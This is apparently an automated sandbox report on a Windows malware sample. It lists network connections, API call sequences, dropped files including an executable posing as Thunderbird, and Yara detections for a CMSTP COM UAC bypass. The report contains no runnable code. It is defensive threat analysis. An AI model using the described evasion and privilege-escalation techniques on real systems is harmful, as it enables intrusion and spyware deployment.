Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877

Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49981 version: TLS 1.2

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

Code function: 2_2_100250E1 OpenClipboard,EmptyClipboard,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,WideCharToMultiByte,SetClipboardData,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,

2_2_100250E1

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

2_2_100250E1

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

Code function: 2_2_10024BC2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,OpenClipboard,?BeginUndoAction@CellBuffer@@QAEXXZ,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GetClipboardData,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,GetClipboardData,GlobalSize,MultiByteToWideChar,CloseClipboard,?EndUndoAction@CellBuffer@@QAEXXZ,

2_2_10024BC2

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.cmd.exe.5422acd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.Qjsync.exe.27a86ed.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.Qjsync.exe.27a7aed.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.579eacd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.5759a00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.Qjsync.exe.2762a20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.cmd.exe.5182a00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.Qjsync.exe.26b1a20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.34607f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.53dda00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.cmd.exe.51c86cd.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.54236cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.cmd.exe.51c7acd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.579f6cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.Qjsync.exe.26f76ed.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.Qjsync.exe.26f6aed.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Users\user\Desktop\UolJwovI8c.exe

File deleted: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C001D	0_2_005C001D
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005B41EA	0_2_005B41EA
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005962AA	0_2_005962AA
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005BC332	0_2_005BC332
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C03D5	0_2_005C03D5
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005CA560	0_2_005CA560
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C07AA	0_2_005C07AA
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_0059A8F1	0_2_0059A8F1
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005CAA0E	0_2_005CAA0E
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C0B6F	0_2_005C0B6F
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005BFB89	0_2_005BFB89
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C2C18	0_2_005C2C18
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C2E47	0_2_005C2E47
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005CEE7C	0_2_005CEE7C
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0054001D	2_2_0054001D
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_005341EA	2_2_005341EA
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_005162AA	2_2_005162AA
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0053C332	2_2_0053C332
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_005403D5	2_2_005403D5
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0054A560	2_2_0054A560
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_005407AA	2_2_005407AA
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0051A8F1	2_2_0051A8F1
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0054AA0E	2_2_0054AA0E
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00540B6F	2_2_00540B6F
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0053FB89	2_2_0053FB89
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00542C18	2_2_00542C18
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00542E47	2_2_00542E47
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0054EE7C	2_2_0054EE7C
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_100650D5	2_2_100650D5
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_1007321C	2_2_1007321C
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10067340	2_2_10067340
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_100655AA	2_2_100655AA
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_1006D6C1	2_2_1006D6C1
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10073760	2_2_10073760
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_1004D899	2_2_1004D899
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_100358D6	2_2_100358D6
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_1006597E	2_2_1006597E
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10039CFF	2_2_10039CFF
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10051D13	2_2_10051D13
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10025D59	2_2_10025D59
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10065D8A	2_2_10065D8A
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_1005DDD0	2_2_1005DDD0
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10073E58	2_2_10073E58
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10041FD2	2_2_10041FD2
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_100661AA	2_2_100661AA
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10025D59	2_2_10025D59
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10062CC0	2_2_10062CC0
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10072CD8	2_2_10072CD8
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_1002AF28	2_2_1002AF28
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10074F8D	2_2_10074F8D
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Code function: 3_2_00A1C995	3_2_00A1C995
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Code function: 3_2_00A1867F	3_2_00A1867F
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Code function: 4_2_600E2098	4_2_600E2098
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Code function: 4_2_60105947	4_2_60105947
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Code function: 4_2_600DB1B5	4_2_600DB1B5
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Code function: 4_2_600E0AB5	4_2_600E0AB5
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Code function: 4_2_60118685	4_2_60118685

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\Qjsync.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 00513821 appears 501 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 10069ABC appears 45 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 10063D94 appears 77 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 005532F3 appears 85 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 10067974 appears 54 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 00550726 appears 34 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 10066D70 appears 196 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 00550237 appears 683 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 10063CBC appears 110 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 00511F13 appears 54 times
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: String function: 100423D6 appears 34 times
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: String function: 005D0726 appears 34 times
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: String function: 00591F13 appears 54 times
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: String function: 005D0237 appears 683 times
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: String function: 00593821 appears 501 times
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: String function: 005D32F3 appears 85 times

Source: Qjsync.exe.8.dr

Static PE information: Resource name: ZIP type: Zip archive data (empty)

Source: idrccptxisabu.8.dr	Static PE information: Number of sections : 12 > 10
Source: ekxwihvmv.20.dr	Static PE information: Number of sections : 12 > 10

Source: UolJwovI8c.exe, 00000000.00000000.2141545614.00000000005FD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecryoscope.exe0 vs UolJwovI8c.exe
Source: UolJwovI8c.exe, 00000002.00000000.2146442375.000000000057D000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamecryoscope.exe0 vs UolJwovI8c.exe
Source: UolJwovI8c.exe, 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameScintilla.DLL4 vs UolJwovI8c.exe
Source: UolJwovI8c.exe, 00000002.00000003.2152299284.0000000001237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename8 vs UolJwovI8c.exe

Source: UolJwovI8c.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP

Source: 14.2.cmd.exe.5422acd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.Qjsync.exe.27a86ed.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.Qjsync.exe.27a7aed.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.579eacd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.5759a00.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.Qjsync.exe.2762a20.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.cmd.exe.5182a00.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.Qjsync.exe.26b1a20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.34607f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.53dda00.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.cmd.exe.51c86cd.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.54236cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.cmd.exe.51c7acd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.579f6cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.Qjsync.exe.26f76ed.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.Qjsync.exe.26f6aed.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.spyw.expl.evad.winEXE@22/41@1/1

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005CFE21 FormatMessageW,GetLastError,LocalFree,

0_2_005CFE21

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005945EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		0_2_005945EE
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_005145EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		2_2_005145EE

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005D304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

0_2_005D304F

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005B6B88 ChangeServiceConfigW,GetLastError,

0_2_005B6B88

Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe

File created: C:\Users\user\AppData\Roaming\GZManage

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3896:120:WilError_03

Source: C:\Users\user\Desktop\UolJwovI8c.exe

File created: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\

Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: cabinet.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: msi.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: version.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: wininet.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: comres.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: clbcatq.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: msasn1.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: crypt32.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: feclient.dll	0_2_00591070
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Command line argument: cabinet.dll	0_2_00591070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: cabinet.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: msi.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: version.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: wininet.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: comres.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: clbcatq.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: msasn1.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: crypt32.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: feclient.dll	2_2_00511070
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Command line argument: cabinet.dll	2_2_00511070

Source: UolJwovI8c.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\cmd.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
